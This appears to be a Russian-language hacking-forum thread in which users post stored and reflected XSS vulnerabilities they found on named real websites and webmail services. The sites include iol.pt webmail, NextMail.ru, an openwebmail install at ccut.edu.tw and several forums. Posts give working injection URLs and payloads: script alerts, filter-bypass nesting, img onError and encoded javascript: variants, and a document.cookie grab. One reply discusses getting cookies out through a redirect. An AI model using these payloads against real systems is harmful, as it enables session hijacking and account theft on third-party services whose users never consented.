moskva.ru - ставим имя заходим в поиск по интересам и вуаля алерт сработал чувствую там ещё много багов будет
http://vip-file.com Заливаем .html файл с ксской .. Пример: http://vip-file.com/download/ae25b2336179/asdwqerfawdq3d.htm.html --------- Жаль, что ток у мну пашет ( -deleted-
20minut.ua PR 4 активка - сам очень удивился после того как ввел это в строку... после чего зашев на 20minut.ua я увидел свой алерт )
_http://www.e-xoopport.it/modules/news/ Активная XSS в системе комментариев, в теле сообщения!) Не фильтруется вообще ничего)
http://novy.tv/services/chat/ Чат "Нового Канала" Если кто узнает движок, сообщите плз, такой же у прова стоит... Регаемся, заходим (visto:visto) Слева, там где Интонация, выбираем "настройка", добавляем свой вариант - В меню --- записная книжка --- добавляем запись: Ну вообщем может кому пригодится.. и еще фича: если написать в чате сообщение !b blabla ! то текст blabla беоеться в теги
iol.pt Активная XSS в почте, Идем в яшик ( http://webmail.iol.pt/horde/dimp/#folder:INBOX ) Шлем письмо, Para: - кому, Assunto: - ксс - <script>alert()</script><noscript> // BlackSun
Активная XSS в бесплатной почтовой системе NextMail.ru @nextmail.ru @nxt.ru @epage.ru @email.su @student.su @hu2.ru @xaker.ru @mail2k.ru @dezigner.ru @programist.ru @onlymail.ru @logmail.ru Отправляем письмо адресату с прикрепленным файлом, в прикрепленном файле пишем код. (прим.: <script>alert(document.coocke);</script>) XSS работает только(!) в IE (по крайней мере у меня в Опере и Мозилле не сработало)
Bonnie and Clyde, работает и в ие, и в опере, и в фф: https://forum.antichat.ru/showpost.php?p=779537&postcount=229
Code: _http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-send.pl?sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E _http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-advsearch.pl?sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E _http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-folder.pl?action=editfolders&sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E _http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-prefs.pl?action=editprefs&sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E _http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-abook.pl?sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E _http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-main.pl?sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E _http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-read.pl?sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E _http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-cal.pl?sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E _http://ms1.ccut.edu.tw/cgi-bin/openwebmail/openwebmail-webdisk.pl?action=showdir&sessionid=%3Cscript%3Ealert('XEK')%3C/script%3E
Блог: http://blogspot.com/ пример первой попавшейся xss. при создании своего блога вписываем алер и: http://1111vvv.blogspot.com/
от нее смысла нету. куки она не передает так как куки идут с блогера. только если связку ставить или редирект
http://mymail-in.net/ срабатывает 11 XSS в теле письма. проверено с помощью "SMTP XSS Tester v1.0" // Наверное это можно считать за активную xss?
http://nexile.ru/href/5713.html В обьявлениях фильтруется script соответственно "><scr<script>ipt>alert()</scr</script>ipt>
Сервер: mail.km.ru зарегал мыло на http://bossmail.ru/ создаем письмо, вписываем в него алерты с таким телом письма: Code: <body> <img src="a"onError=alert(121)> <img src='a'onError=alert(122)> <img src=javascript
:alert(79)> <img src=javascript
:alert(68)> <img src=javascript	:alert(57)> <img src=javascript:alert(46)> <img src=javascript:alert(16)> </body> открываем письмо у себя в папке или отправляем его с небольшими изменениями ; )
xss PR 2 тИЦ 10 http://www.auto-magnitola.ru/forum/index.php Уязвимы все поля в форуме. Ничего не фильтруется ))